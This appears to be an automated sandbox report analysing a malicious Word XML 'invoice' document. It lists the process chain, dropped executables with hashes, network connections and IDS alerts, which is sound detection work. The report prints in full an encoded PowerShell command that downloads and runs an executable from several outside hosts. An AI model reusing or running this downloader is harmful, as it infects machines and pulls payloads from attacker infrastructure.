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 ZP4UAFFFFABRRRQAUUUUATwXctvBcRR7dlwgjfI7Ag8fiKgpetFJRSd0W5SaSZZkv5X09LJUjjhV g7CNcGRgMAse/H4c1VoooUUtglOUt2FFFFMi4UUUUAFFFFAXYtOeWR440d2ZYwQik8KCcnHpzzTK KLId2GKKKKBXCiiigA68nrRRRQAUUUUBcKMUUUAFFFFABRRRQAYHpRRRQO7CiiigLsKKKKBXYUUU UBcKKKKAuwoxRRQO7CiiigQUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUA FFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU UUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRR RQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAdKKKKACiiigAooooAKKKKACii igAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKK ACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA KKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAo oooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii igAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKK ACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA KKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAP/Z |
WordDocumentBodySectPRPictShapeId: | Picture 1 |
WordDocumentBodySectPRPictShapeSpid: | _x0000_i1025 |
WordDocumentBodySectPRPictShapeType: | #_x0000_t75 |
WordDocumentBodySectPRPictShapeStyle: | width:468pt;height:161.25pt;visibility:visible;mso-wrap-style:square |
WordDocumentBodySectPRPictShapeImagedataSrc: | wordml://h0_627_.S2097_20.Z695_953 |
WordDocumentBodySectPRPictShapeImagedataTitle: | - |
WordDocumentBodySectPRT: | |
WordDocumentBodySectSectPrRsidR: | 00005EB7 |
WordDocumentBodySectSectPrPgSzW: | 12240 |
WordDocumentBodySectSectPrPgSzH: | 15840 |
WordDocumentBodySectSectPrPgMarTop: | 1440 |
WordDocumentBodySectSectPrPgMarRight: | 1440 |
WordDocumentBodySectSectPrPgMarBottom: | 1440 |
WordDocumentBodySectSectPrPgMarLeft: | 1440 |
WordDocumentBodySectSectPrPgMarHeader: | 720 |
WordDocumentBodySectSectPrPgMarFooter: | 720 |
WordDocumentBodySectSectPrPgMarGutter: | - |
WordDocumentBodySectSectPrColsSpace: | 720 |
WordDocumentBodySectSectPrDocGridLine-pitch: | 360 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3492 | "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\Factura-2019-090005-01-02-2019.doc.xml" | C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: XML Editor Exit code: 0 Version: 14.0.4750.1000 | ||||
3172 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Factura-2019-090005-01-02-2019.doc.xml" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | MSOXMLED.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3364 | powershell -e JABQADUAOQAwADQAMwA9ACgAJwB6ADMAJwArACcAXwAnACsAJwA1AF8AXwAnACkAOwAkAHUAMgBfADIAXwA2AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGQAMAAxAF8AXwAzAD0AKAAnAGgAdAB0AHAAOgAvAC8AJwArACcAOAAxAC4ANQAnACsAJwA2AC4AMQA5ADgALgAyACcAKwAnADAAMAAvAE0AcgBNACcAKwAnAEEARgAnACsAJwBXAE8AawA5AEAAJwArACcAaAB0AHQAJwArACcAcAA6AC8ALwA1ADQALgAxACcAKwAnADYANQAnACsAJwAuADIANQAzAC4AJwArACcAMQAvACcAKwAnADQAbQBCAEIATgBjAHMARwAnACsAJwBZACcAKwAnAEwAQABoAHQAJwArACcAdABwADoALwAvADUANAAnACsAJwAuACcAKwAnADIAMgA0AC4AMgAnACsAJwA0ADAAJwArACcALgAnACsAJwAzADQAJwArACcALwBMADAAUAAnACsAJwBSAG0AZQBwAGUANgBAAGgAdAB0AHAAOgAvAC8AbgBvAGkAdABoAGEAdABjAGgAdQAnACsAJwBuAGcAYwB1AGQAZQBwAC4AaQBuAGYAbwAvADQANwB1AHIAJwArACcASwBwAFgAMwBAAGgAdAB0AHAAOgAnACsAJwAvAC8AMQAyADgALgAxADkAOQAuADYAOAAuACcAKwAnADIAOAAvAFEAWgBwADUANQB4AHgAJwArACcAQwAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABuAF8ANABfADAAMwAxAD0AKAAnAGsANwAnACsAJwA3ADkAJwArACcANgBfACcAKQA7ACQAbgAzAF8AXwA0ADcAIAA9ACAAKAAnADIAJwArACcAMQAxACcAKQA7ACQAaAAwAF8AMABfAF8APQAoACcAVQAnACsAJwA3ACcAKwAnAF8ANAA4AF8AJwApADsAJABCADIAXwA5ADYAOQA5AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABuADMAXwBfADQANwArACgAJwAuACcAKwAnAGUAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEkAMwAwADAANQBfADEAIABpAG4AIAAkAGQAMAAxAF8AXwAzACkAewB0AHIAeQB7ACQAdQAyAF8AMgBfADYALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQASQAzADAAMAA1AF8AMQAsACAAJABCADIAXwA5ADYAOQA5ACkAOwAkAEEANgAzAF8ANgAyADQAPQAoACcAaQAwAF8AXwAnACsAJwA5ADQAOQAnACkAOwBJAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABCADIAXwA5ADYAOQA5ACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAQgAyAF8AOQA2ADkAOQA7ACQAUQA1ADgAMQAzADUANgA9ACgAJwBqACcAKwAnADkAMQAzADAAJwArACcANQA0ADYAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEwAXwA4ADcAXwA1AD0AKAAnAGkAOQBfACcAKwAnADMAMwBfACcAKQA7AA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3720 | "C:\Users\admin\211.exe" | C:\Users\admin\211.exe | — | powershell.exe |
User: admin Company: Microsoft Corporatio Integrity Level: MEDIUM Description: EFS UI Application Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713- | ||||
2604 | "C:\Users\admin\211.exe" | C:\Users\admin\211.exe | 211.exe | |
User: admin Company: Microsoft Corporatio Integrity Level: MEDIUM Description: EFS UI Application Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713- | ||||
3508 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | 211.exe | |
User: admin Company: Microsoft Corporatio Integrity Level: MEDIUM Description: EFS UI Application Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713- | ||||
2752 | "C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe" | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | wabmetagen.exe | |
User: admin Company: Microsoft Corporatio Integrity Level: MEDIUM Description: EFS UI Application Version: 6.1.7600.16385 (win7_rtm.090713- |
PID | Process | Filename | Type | |
---|---|---|---|---|
3172 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8E6B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3172 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70209946.Z695_953 | — | |
MD5:— | SHA256:— | |||
3364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HEK5KKFNX12HXRTQBWUT.temp | — | |
MD5:— | SHA256:— | |||
3364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199a52.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3172 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$ctura-2019-090005-01-02-2019.doc.xml | pgc | |
MD5:2F39D3E433B30143246B5C86D4BD6FC7 | SHA256:D2DEC28C69BDA910E017366283434F29AA61E3912C1549EEE5DA9195AA99DC34 | |||
3364 | powershell.exe | C:\Users\admin\211.exe | executable | |
MD5:8D3D095610DA17BFC3C799D415072054 | SHA256:E6F0E5F1BADA4C1F17E7310063658831AD30B22F032CF11F39B42D6FC0671324 | |||
3172 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:BCA7725C8CB9C8D63EC166E879124B21 | SHA256:05E75A6D04CEFC391DEAF88AFF57A37ECFC5F3AF4F711DC7518EB32A07640D73 | |||
2604 | 211.exe | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | executable | |
MD5:8D3D095610DA17BFC3C799D415072054 | SHA256:E6F0E5F1BADA4C1F17E7310063658831AD30B22F032CF11F39B42D6FC0671324 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2752 | wabmetagen.exe | GET | — | 88.225.226.91:443 | http://88.225.226.91:443/ | TR | — | — | malicious |
3364 | powershell.exe | GET | 200 | 81.56.198.200:80 | http://81.56.198.200/MrMAFWOk9/ | FR | executable | 152 Kb | suspicious |
3364 | powershell.exe | GET | 301 | 81.56.198.200:80 | http://81.56.198.200/MrMAFWOk9 | FR | html | 239 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3364 | powershell.exe | 81.56.198.200:80 | — | Free SAS | FR | suspicious |
2752 | wabmetagen.exe | 88.225.226.91:443 | — | Turk Telekom | TR | malicious |
PID | Process | Class | Message |
---|---|---|---|
3364 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3364 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3364 | powershell.exe | Potentially Bad Traffic | ET INFO SUSPICIOUS Dotted Quad Host MZ Response |
3364 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |